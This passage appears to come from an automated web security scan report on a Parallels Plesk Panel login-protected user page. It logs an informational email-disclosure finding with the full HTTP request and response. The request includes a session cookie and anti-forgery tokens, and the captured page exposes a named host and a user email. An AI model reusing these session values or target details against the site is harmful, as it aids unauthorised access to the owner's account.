<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/3

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/user/edit/id/3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:51:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:51:20 GMT
Connection: close
Content-Length: 45474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>format-1 - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F3' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1</b></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="format-1" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="format-1" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="format-1@nosedivesailing.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'>format-1@nosedivesailing.com</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
